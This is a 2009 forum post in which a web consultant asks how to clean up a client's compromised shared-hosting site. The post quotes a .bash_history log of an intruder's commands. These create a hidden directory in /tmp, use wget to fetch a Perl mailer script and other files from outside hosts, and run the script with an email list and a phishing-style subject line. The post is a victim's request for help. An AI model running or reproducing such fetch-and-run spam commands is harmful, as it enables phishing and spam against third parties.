Msg#: 4013249 posted 2:15 am on Oct 26, 2009 (gmt 0)
Hello everyone, Not sure if I should post this here or in the search forum. I have a new client that came to me because his site's rankings plummetted a year ago. The site is still indexed and I started checking for a server hack. The site is on a shared server and malware is detected on other sites within that server. I started checking files on the site line by line. In the .bash_history file I saw the following code:
cd /tmp mkdir .dc cd .dc wget infbr.iespana.es/enviar.pl echo firstname.lastname@example.org > rev.txt perl enviar.pl rev.txt sudfhsd sduhf usdhf wget [topmagia.ru...] wget [topmagia.ru...] perl enviar.pl novaboa.txt email@example.com "O carteiro enviou este cartao para ti" ocarteiro.txt
Which fits the profile of spam. I plan to call the hosting company tomorrow and request the site be moved to another server.
My question is, can I remove the content of this file (what and how much should I delete?). And are there any suggestions on where else I should look to see what this code has done?
I am not a whiz when it comes to server-side files. Any help would be greatly appreaciated!